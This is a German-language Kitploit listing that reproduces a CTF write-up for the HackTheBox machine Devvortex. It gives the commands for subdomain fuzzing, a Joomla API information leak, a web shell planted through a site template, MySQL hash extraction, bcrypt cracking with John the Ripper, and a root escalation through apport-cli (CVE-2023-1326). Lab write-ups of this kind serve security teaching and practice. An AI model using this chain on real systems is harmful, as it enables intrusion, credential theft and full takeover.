Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DEVVORTEX — HackTheBox Devvortex Walkthrough mit Subdomain-Fuzzing, Joomla-API-Enumeration, template-basierter Web-Shell, bcrypt-Hash-Cracking und Apport-CLI CVE-2023-1326 Privilegieneskalation. | Kitploit
Tools/GitHubGitHub/r3fr4kt/devvortex
Passwort-CrackingPrivilege EscalationSchwachstellenanalyseWebanwendungs-ExploitationInformationsbeschaffungCTFPenetrationstestsSubdomain-EnumerationLernen & BildungLabs & Praxis
GitHubr3fr4kt/devvortex
vor 7h 58mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DEVVORTEX

HackTheBox Devvortex Walkthrough mit Subdomain-Fuzzing, Joomla-API-Enumeration, template-basierter Web-Shell, bcrypt-Hash-Cracking und Apport-CLI CVE-2023-1326 Privilegieneskalation.

Repository anzeigen

DEVVORTEX

HackTheBox: Devvortex — Machine Write-Up

Ein umfassender technischer Walkthrough, der die Kompromittierung der Devvortex-Maschine auf HackTheBox detailliert beschreibt. Dieser Pfad demonstriert Subdomain-Fuzzing, Joomla-API-Enumeration, Template-Modifikation für den initialen Zugriff, Datenbank-Hash-Extraktion & Cracking für laterale Bewegung sowie die Ausnutzung von Apport-CLI (CVE-2023-1326) zur Privilegieneskalation zu root.


Executive Summary

  • Ziel-OS: Linux
  • Schwierigkeit: Easy
  • Domain: devvortex.htb
  • Subdomain: dev.devvortex.htb
  • Schlüsselkonzepte: Subdomain-Enumeration, Joomla-CMS-Exploitation, Informationsoffenlegung, Bcrypt-Hash-Cracking, Sudo-Missbrauch (apport-cli).

1. Reconnaissance & Enumeration

Port-Scanning (Nmap)

Eine initiale schnelle TCP-Port-Erkennung wurde über alle Ports durchgeführt:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

Ein anschließender Service- und Versionserkennungsscan wurde gegen die identifizierten offenen Ports ausgeführt:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

Hostfile-Konfiguration

Fügen Sie die Basis-Zieldomain zur lokalen Hostnamen-Auflösungstabelle hinzu:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

Subdomain-Erkennung (FFUF)

Fuzzing virtueller Hosts zur Identifizierung zusätzlicher Web-Assets:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

Ergebnis: dev.devvortex.htb entdeckt. dev.devvortex.htb zu /etc/hosts hinzugefügt.

Directory-Fuzzing

Enumeration von Routen auf dem neu entdeckten virtuellen Host:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

Ergebnis: Der Endpunkt /administrator wurde entdeckt, der ein Joomla-Admin-Authentifizierungsportal offenlegt.

2. Initialer Zugriff (Foothold)

Informationsleck über die Joomla-API

Abfragen öffentlicher Endpunkte, die von Joomlas REST-API bereitgestellt werden, um sensible Anwendungsmetriken und Benutzer zu sammeln:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

Web-Shell-Injection über Site-Templates

Melden Sie sich mit den während der Enumeration entdeckten Anmeldedaten im Joomla-/administrator-Portal an:

  1. Navigieren Sie zu System > Site Templates.

  2. Wählen Sie das aktive Template aus und öffnen Sie error.php.

  3. Ersetzen Sie den Inhalt von error.php durch eine Standard-PHP-Reverse-Shell-Payload.

Initialisieren Sie einen lokalen Netcat-Listener:

Bash

root@kitploit:~
nc -lvnp 4444

Lösen Sie die Ausführung von error.php aus, indem Sie eine nicht existierende Seite anfordern oder die Datei direkt aufrufen.

TTY-Shell-Stabilisierung

Sobald die Shell als www-data verbunden ist, starten Sie eine interaktive PTY-Sitzung:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. Laterale Bewegung (Logan)

Datenbank-Enumeration

Greifen Sie mit den aus den Web-Konfigurationsdateien abgerufenen Anmeldedaten auf die lokale MySQL-Datenbank zu:

Bash

root@kitploit:~
mysql -u lewis -p

Fragen Sie die Benutzertabelle ab, um gespeicherte Credential-Hashes zu finden:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

Offline-Passwort-Cracking

Extrahieren Sie den bcrypt-Passwort-Hash für den Benutzer logan in eine lokale Datei:

Bash

root@kitploit:~
nano hash.txt

Knacken Sie den Hash mit John the Ripper zusammen mit rockyou.txt:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Authentifizierung über SSH

Stellen Sie eine persistente SSH-Sitzung als Benutzer logan mit den geknackten Anmeldedaten her:

Bash

root@kitploit:~
ssh [email protected]

User-Flag

Bash

root@kitploit:~
cat user.txt

4. Privilegieneskalation

Sudo-Privilegien-Audit

Überprüfen Sie erlaubte Binärdateien für den Benutzer logan:

Bash

root@kitploit:~
sudo -l

Ausgabe: Benutzer darf /usr/bin/apport-cli als root ausführen.

Apport-CLI-Exploitation (CVE-2023-1326)

Überprüfen Sie die installierte Version von apport-cli:

Bash

root@kitploit:~
apport-cli --version

Überprüfen Sie /var/crash auf vorhandene Report-Dateien. Falls leer, erstellen Sie manuell eine Crash-Datei:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

Starten Sie apport-cli gegen die erstellte Crash-Datei mit sudo:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. Drücken Sie v, um den Report anzuzeigen.

  2. Wenn der Paginator (less) den Inhalt lädt, entkommen Sie zu einer System-Shell, indem Sie eingeben:

Plaintext

root@kitploit:~
!/bin/bash

5. System-Konsolidierung

Überprüfen Sie die Root-Elevation:

Bash

root@kitploit:~
whoami
# Output: root

Root-Flag

Bash

root@kitploit:~
cat /root/root.txt
Tool herunterladen